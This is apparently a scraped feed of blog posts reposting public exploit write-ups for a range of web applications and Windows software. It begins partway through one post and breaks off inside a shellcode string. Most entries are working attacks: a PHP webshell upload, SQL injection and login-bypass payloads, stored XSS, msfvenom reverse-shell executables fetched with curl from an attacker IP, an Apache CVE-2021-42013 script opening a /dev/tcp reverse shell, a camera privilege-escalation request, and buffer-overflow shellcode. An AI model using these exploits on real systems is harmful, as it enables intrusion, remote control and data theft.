    # Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) # Date: 10/23/2021 # Exploit Author: SadKris # Venor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Version: 1.0 # Tested on: XAMPP, Windows 11 # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /EngineerShit/teacher_avatar.php HTTP/1.1 Host: localhost.me Content-Length: 510 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost.me Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost.me/EngineerShit/dasboard_teacher.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="image"; filename="vuln.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="change" # Response HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:51:19 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 <script> window.location = "dasboard_teacher.php"; </script> # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1 Host: localhost.me Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:54:07 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 154 Connection: close Content-Type: text/html; charset=UTF-8 <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> gottem bois
  12. HireHackking

    Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated) # Date: 24/10/2021 # Exploit Author: Nehru Sethuraman # Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart # Version: 21.0817 # Build: 3 # Google Dorks: intitle:buildsmart accounting # Tested on: OS - Windows 2012 R2 or 8.1 & Database - Microsoft SQL Server 2014 Exploit Details: URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl= *HTTP Method:* POST *POST DATA:* VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail= Vulnerable Parameter: eidValue SQL Injection Type: Stacked queries Payload: ';WAITFOR DELAY '0:0:3'--
  13. HireHackking

    OpenClinic GA 5.194.18 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenClinic GA 5.194.18 - Local Privilege Escalation # Date: 2021-07-24 # Author: Alessandro Salzano # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/files/latest/download # Version: 5.194.18 # Tested on: Microsoft Windows 10 Enterprise x64 Open Source Integrated Hospital Information Management System. OpenClinic GA is an open source integrated hospital information management system covering management of administrative, financial, clinical, lab, x-ray, pharmacy, meals distribution and other data. Extensive statistical and reporting capabilities. Vendor: OpenClinic GA. Affected version: > 5.194.18 # Details # By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below. # A low privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also have unquoted service path issues. (1) Impacted services. Any low privileged user can elevate their privileges abusing MariaDB service: C:\projects\openclinic\mariadb\bin\mysqld.exe Details: SERVICE_NAME: OpenClinicHttp TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\tomcat8\bin\tomcat8.exe //RS//OpenClinicHttp LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicHttp DEPENDENCIES : Tcpip : Afd SERVICE_START_NAME : NT Authority\LocalServic -------- SERVICE_NAME: OpenClinicMySQL TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicMySQL DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: icacls C:\projects\openclinic C:\projects\openclinic Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
  14. HireHackking

    Gestionale Open 11.00.00 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation # Date: 2021-07-19 # Author: Alessandro 'mindsflee' Salzano # Vendor Homepage: https://www.gestionaleopen.org/ # Software Homepage: https://www.gestionaleopen.org/ # Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe # Version: 11.00.00 # Tested on: Microsoft Windows 10 Enterprise x64 With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation. Vendor: Gestionale Open srl. Affected version: > 11.00.00 # Details # By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below. # A low privilege account is able to rename the mysqld.exe file located in bin folder and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also have unquoted service path issues. (1) Impacted services. Any low privileged user can elevate their privileges abusing MariaDB service: C:\Gestionale_Open\MySQL57\bin\mysqld.exe Details: SERVICE_NAME: DB_GO TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DB_GO DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: C:\Gestionale_Open Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
  15. HireHackking

    Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) # Credits: Ash Daulton & cPanel Security Team # Date: 24/07/2021 # Exploit Author: TheLastVvV.com # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.50 with CGI enable # Tested on : Debian 5.10.28 # CVE : CVE-2021-42013 #!/bin/bash echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' if [ $# -eq 0 ] then echo "try: ./$0 http://ip:port LHOST LPORT" exit 1 fi curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh" #usage chmod -x CVE-2021-42013.sh #./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT
  16. HireHackking

    Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated) # Date: 24.10.2021 # Exploit Author: blockomat2100 # Vendor Homepage: https://www.balbooa.com/ # Version: 2.0.6 # Tested on: Docker An example request to trigger the SQL-Injection: POST /index.php?option=com_baforms HTTP/1.1 Host: localhost Content-Length: 862 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035 Connection: close ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="1" {"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}} ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="form-id" 1 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="task" form.message ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="submit-btn" 2 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-title" Home ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-url" http://localhost/ ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-id" 0 ------WebKitFormBoundaryTAak6w3vHUykgInT--
  17. HireHackking

    Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # CVE : cve-2021-42664 # Vulnerable page: add_quiz.php # Vulnerable Parameters: "quiz_title", "description" Technical description: A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php 2) Insert your payload in the "quiz_title" parameter or the "description" parameter 3) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert("This is an XSS Give me your cookies")</script> --- POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save= OR POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6 Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save= ---
  18. HireHackking

    Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip # Version: 1.0 # Tested on: Linux # Vulnerable page: HOLY # Vulnerable Parameters: "reason" Technical description: A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/event-management/views/?v=HOLY 2) Insert your payload in the "reason" parameter 3) Click "Add holiday" Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert("This is an XSS")</script> --- POST /event-management/api/process.php?cmd=holiday HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 81 Origin: http://localhost Connection: close Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted. Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E ---
  19. HireHackking

    Engineers Online Portal 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: quiz_question.php # Vulnerable Parameter: "id" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php 2) Insert your payload in the id parameter Proof of concept (Poc): The following payload will allow you to extract the MySql server version running on the web server - ' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- - --- GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 ---
  20. HireHackking

    WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/media-tags/ # Software Link: www.codehooligans.com/projects/wordpress/media-tags/ # Version: 3.2.0.2 # Tested on Windows *How to reproduce vulnerability:* 1. Install Latest WordPress 2. Install and activate Media-Tags <= 3.2.0.2 3. Navigate to Add Table >> add the payload into 'Media Tag Label Fields' and enter the data into the user input field. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
  21. HireHackking

    Engineers Online Portal 1.0 - 'multiple' Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: login.php # VUlnerable parameters: "username", "password" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - ' OR '1'='1';-- - --- POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 41 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username='+or+'1'%3D'1'%3B--+-&password=sqli OR POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 44 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username=sqli&password='+or+'1'%3D'1'%3B--+- ---
  22. HireHackking

    WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/ninja-tables/ # Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/ # Version: 4.1.7 # Tested on Windows *How to reproduce vulnerability:* 1. Install Latest WordPress 2. Install and activate Ninja Tables <= 4.1.7 3. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data' and enter the data into the user input field.Then Navigate to Table Design 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
  23. HireHackking

    Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4) # Author: P4p4_M4n3 # Vendor Homepage: http://codiad.com/ # Software Links : https://github.com/Codiad/Codiad/releases # Type: WebApp ###################-------------------------##########################------------################### # Proof of Concept: # # # # 1- login on codiad # # # # 2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory # # # # 3- right click and select upload file # # # # 4- click on "Drag file or Click Here To Upload" and select your reverse_shell file # # # ###################-------------------------#########################-------------################### after that your file should be in INF directory, right click on your file and select delete, and you will see the full path of your file run it in your terminal with "curl" and boom!! /var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php 1 - # nc -lnvp 1234 2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"
  24. HireHackking

    i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw # Date: 27.10.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.i3international.com i3 International Annexxus Cameras Ax-n 5.2.0 Application Logic Flaw Vendor: i3 International Inc. Product web page: https://www.i3international.com Affected version: V5.2.0 build 150317 (Ax46) V5.0.9 build 151106 (Ax68) V5.0.9 build 150615 (Ax78) Summary: The Annexxus camera 6MP provides 4 simultaneous, independently controlled digital pan-tilt-zoom (ePTZ) video streams, which may be recorded or viewed live as well as a built-in microphone and speaker allowing two way communication. Desc: The application doesn't allow creation of more than one administrator account on the system. This also applies for deletion of the administrative account. The logic behind this restriction can be bypassed by parameter manipulation using dangerous verbs like PUT and DELETE and improper server-side validation. Once a normal account with 'viewer' or 'operator' permissions has been added by the default admin user 'i3admin', a PUT request can be issued calling the 'UserPermission' endpoint with the ID of created account and set it to 'admin' userType, successfully adding a second administrative account. Tested on: App-webs/ Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5688 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5688.php 27.10.2021 -- Make user ID 3 an Administrator: -------------------------------- PUT /PSIA/Custom/SelfExt/UserPermission/3 HTTP/1.1 Host: 192.168.1.1 Content-Length: 556 Cache-Control: max-age=0 Accept: */* X-Requested-With: XMLHttpRequest If-Modified-Since: 0 Authorization: Basic aTNhZG1pbjppM2FkbWlu User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Content-Type: application/x-www-form-urlencoded Origin: http://192.168.1.1 Referer: http://192.168.1.1/doc/setup.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin Connection: close <?xml version='1.0' encoding='utf-8'?><UserPermission><id>3</id><userID>3</userID><userType>admin</userType><remotePermission><playBack>true</playBack><preview>true</preview><record>true</record><ptzControl>true</ptzControl><upgrade>true</upgrade><parameterConfig>true</parameterConfig><restartOrShutdown>true</restartOrShutdown><logOrStateCheck>true</logOrStateCheck><voiceTalk>true</voiceTalk><transParentChannel>true</transParentChannel><contorlLocalOut>true</contorlLocalOut><alarmOutOrUpload>true</alarmOutOrUpload></remotePermission></UserPermission> HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 14:13:56 GMT Server: App-webs/ Connection: close Content-Length: 238 Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <ResponseStatus version="1.0" xmlns="urn:psialliance-org"> <requestURL>/PSIA/Custom/SelfExt/UserPermission/3</requestURL> <statusCode>1</statusCode> <statusString>OK</statusString> </ResponseStatus> Delete Administrator user ID 3: ------------------------------- DELETE /PSIA/Security/AAA/users/3 HTTP/1.1 Host: 192.168.1.1 Cache-Control: max-age=0 Accept: */* X-Requested-With: XMLHttpRequest If-Modified-Since: 0 Authorization: Basic aTNhZG1pbjppM2FkbWlu User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Origin: http://192.168.1.1 Referer: http://192.168.1.1/doc/setup.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin Connection: close HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 14:20:17 GMT Server: App-webs/ Connection: close Content-Length: 213 Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <ResponseStatus version="1.0" xmlns="urn:psialliance-org"> <requestURL>/PSIA/Security/AAA/users/3</requestURL> <statusCode>1</statusCode> <statusString>OK</statusString> </ResponseStatus>
  25. HireHackking

    10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH) # Date: 2021-10-31 # Exploit Author: ro0k # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Version: 9.31 # Tested on: Windows 10 x64 Education 21H1 Build 19043.928 # Proof of Concept: # 1.Run python2 exploit.py to generate overflow.txt # 2.Transfer overflow.txt to the Windows 10 machine # 3.Setup Netcat listener on attacker machine # 4.Open 10-Strike Network Inventory Explorer Pro # 5.Select Computers tab from the uppermost set of tabs # 6.Select From Text File option # 7.Open overflow.txt # 8.Receive reverse shell connection on attacker machine! #!/usr/bin/env python import struct charslist = "" badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c] for i in range (0x00, 0xFF+1): if i not in badchars: charslist += chr(i) #msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c" shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1" "\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37" "\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37" "\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51" "\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6" "\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45" "\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a" "\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0" "\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa" "\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b" "\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18" "\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b" 